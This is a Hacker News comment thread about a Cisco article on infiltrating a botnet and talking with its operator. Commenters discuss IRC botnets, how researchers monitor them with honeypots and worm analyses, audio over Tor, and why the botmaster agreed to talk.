
Infiltrating a Botnet - A Conversation With a Botmaster - jperras
http://www.cisco.com/web/about/security/intelligence/bots.html
======
allenbrunson
this is a good article. it's pretty clear that, if you had the know-how to
write your own botnet software, you could really clean up. you could design
your own communication protocol, rather than using irc the way everybody else
does, which would help evade detection. windows users are lucky that anybody
capable of such a thing probably already has a much more satisfying "real"
job.

too bad the article devolved into an ad for cisco products at the very end. i
was really digging it up to that point.

~~~
jonny_noog
Seconded. I liked it save for the Cisco advertising as well.

------
flashingpumpkin
nice read there. would make sense to post this link here too:
[http://philosecurity.org/2009/01/12/interview-with-an-
adware...](http://philosecurity.org/2009/01/12/interview-with-an-adware-
author)

~~~
tc
This is the kicker:

 _I got to write half of it in Scheme, which probably means that I deployed
more Scheme runtime than anybody else on the planet._

------
tsally
Solid set of info there. Anyone know or have a guess as to the forum the
botmaster linked to? Email's in profile if you don't feel like posting it for
the public.

~~~
verroq
The name of the bot is fatalzircd according to the guy and they didnt censor
that so its not all lost. After googling that name I found several forums and
easily found one with a source code download.

------
fishercs
He mentioned old school and then quoted 2005, i dont know if its just me but
the idea of a botnet is certainly nothing new, and definately spawned from
IRC.. FWIW you could date the article 1999 and throw in mentions of wingates a
couple of times and sprinkle on some SOCKS proxy information for flavor and
i'd know no different.

------
peregrine
I'd be interested in seeing the code. I've always wanted to see what that side
of the wall does.

------
falsestprophet
Is it possible to monitor bot nets to figure out what they are doing?

~~~
hedgehog
Yep, but it's a lot of work. There at least a few researchers that keep track
of bot activity, reverse samples, monitor via wire-compatible clients, etc.
From what I gather it's getting harder, some newer worms use decentralized
control channels, signed updates, etc.

One way to observe worm behavior: <http://www.honeynet.org/>

SRI writeup on their dissection of Storm: <http://www.cyber-
ta.org/pubs/StormWorm/report/>

------
Estragon

      the researcher suggested a TOR audio conference
    

Audio over TOR? I thought it was too slow for that.

~~~
wizard_2
Skype wouldn't work, but all you need is a 12kps stream. The problem with tor
is sometimes the nodes are very slow, you could probably pick a path that
showed to be faster but as far as I know it's non trivial.

~~~
eru
May work. Tor is not really that slow. It just has a lot of latency.

------
gnosis
A masterful bit of deception. Who would have guessed that a botmaster would be
so trusting?

~~~
whimsy
What did he have to lose? The researcher had already penetrated his botnet,
and if he was hidden behind an "anonymous proxy chain" then his identity
wasn't at risk, non?

~~~
allenbrunson
he had a _lot_ to lose. the "reporter" could have been collecting subtle
details, and trying to match them up with known real-world suspects.

in his position, i certainly wouldn't have talked. but it's probably a lonely
occupation, and who else are you going to talk to.

------
katamole
Interesting article, but the lack of subtlety in some parts made me cringe,
e.g: "wanta be partners?".

